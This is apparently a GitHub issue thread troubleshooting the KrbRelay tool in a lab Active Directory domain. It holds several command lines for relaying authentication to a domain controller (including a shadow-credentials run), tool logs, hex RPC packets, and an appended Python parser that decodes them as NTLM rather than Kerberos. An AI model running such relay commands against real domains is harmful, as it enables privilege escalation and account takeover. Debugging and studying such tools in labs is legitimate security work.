Invalid apReq
mgp25 opened this issue
Hello, I was getting the message "Recieved invalid apReq, exploit will fail" and read issue #1, where you suggested checking the environment and parameters. Could you point out what we should look at?
Info and steps to reproduce
- DC01: Windows Server 2019
- PC01: Windows 10
- Attacker PC: Windows 10
A user is logged on PC01 (session checked with query session):
PS > query session
NOMBRE DE SESIÓN NOMBRE DE USUARIO ID ESTADO TIPO DISPOSITIVO
services 0 Desc
>console user1 1 Activo
Here is the log:
PS C:\Users\attacker\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: DESKTOP-GJKLN17\attacker
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\attacker\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACgd0eTYtluhPpC9CsKnCTbAgQAAKAQ//+ktx2fV11FtiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 1
[-] Recieved invalid apReq, exploit will fail
05000b0710000000e800400002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e209000900370000000f000f00280000000a00614a0000000f4445534b544f502d474a384b4d3437574f524b47524f5550
Hope I am not missing anything
Thanks!
attacker is a non-domain context
Hello @cube0x0, thanks for your fast response!
I tried it within a domain context too but it failed :/
PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: LAB\usuario1
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC+r/qOx2Z1B+pLzMg2PGlZAuwAAGwb//9Nj4c5NmmdUiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 2
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142
Another attempt:
PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn ldap/dc01.lab.local -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
[*] Relaying context: lab.local\PC01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC9YZtQo5H86MSpLrTJ2iK+AjQAAMQB//8h5G+ahu59CCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142
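Added example (not from the KrbRelay project or from either poster in this thread): a small Python parser for the DCERPC bind PDUs dumped after the "Recieved invalid apReq" line in the logs above. It reads the sec_trailer at the end of each PDU and shows that the auth token in all three runs is an NTLMSSP NEGOTIATE message (auth type 10) rather than a Kerberos token; decoding the domain and workstation fields also confirms which host and context sent it.

```python
import struct

# The two distinct DCERPC bind PDUs pasted in the issue logs above (the third run
# printed the same bytes as the second): first from the non-domain "attacker"
# session, second from LAB\usuario1.
BIND_NONDOMAIN = "05000b0710000000e800400002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e209000900370000000f000f00280000000a00614a0000000f4445534b544f502d474a384b4d3437574f524b47524f5550"
BIND_DOMAIN = "05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142"

AUTH_TYPES = {9: "SPNEGO", 10: "NTLMSSP", 16: "KERBEROS"}  # MS-RPCE sec_trailer auth_type
NTLMSSP_NEGOTIATE_VERSION = 0x02000000                     # MS-NLMP: Version field present


def parse_bind_auth(pkt_hex):
    """Return (auth mechanism name, auth_level, auth token bytes) of a DCERPC bind PDU."""
    pkt = bytes.fromhex(pkt_hex)
    if pkt[0] != 5 or pkt[2] != 0x0B:          # rpc_vers 5, PTYPE 11 = bind
        raise ValueError("not a DCERPC v5 bind PDU")
    endian = "<" if pkt[4] & 0x10 else ">"     # packed_drep: integer byte order
    frag_len, auth_len, _call_id = struct.unpack(endian + "HHI", pkt[8:16])
    if len(pkt) != frag_len:
        raise ValueError(f"frag_length {frag_len} but PDU is {len(pkt)} bytes")
    if auth_len == 0:
        return None                            # unauthenticated bind
    off = frag_len - auth_len - 8              # 8-byte sec_trailer precedes the auth token
    auth_type, auth_level, _pad, _rsvd, _ctx = struct.unpack(endian + "BBBBI", pkt[off:off + 8])
    return AUTH_TYPES.get(auth_type, f"type {auth_type}"), auth_level, pkt[off + 8:]


def parse_ntlm_negotiate(token):
    """Decode an NTLMSSP NEGOTIATE_MESSAGE (type 1): flags, domain, workstation, OS build."""
    if token[:8] != b"NTLMSSP\x00" or struct.unpack("<I", token[8:12])[0] != 1:
        raise ValueError("not an NTLMSSP NEGOTIATE_MESSAGE")
    flags = struct.unpack("<I", token[12:16])[0]

    def field(at):  # MS-NLMP field descriptor: Len, MaxLen, BufferOffset (relative to message start)
        length, _maxlen, start = struct.unpack("<HHI", token[at:at + 8])
        return token[start:start + length].decode("ascii")

    info = {"flags": flags, "domain": field(16), "workstation": field(24), "build": None}
    if flags & NTLMSSP_NEGOTIATE_VERSION:      # Version: major(1) minor(1) build(2 LE) ...
        info["build"] = struct.unpack("<H", token[34:36])[0]
    return info


if __name__ == "__main__":
    for name, pdu in (("non-domain", BIND_NONDOMAIN), ("domain", BIND_DOMAIN)):
        mech, level, token = parse_bind_auth(pdu)
        print(name, mech, "auth_level", level, parse_ntlm_negotiate(token) if mech == "NTLMSSP" else "")
```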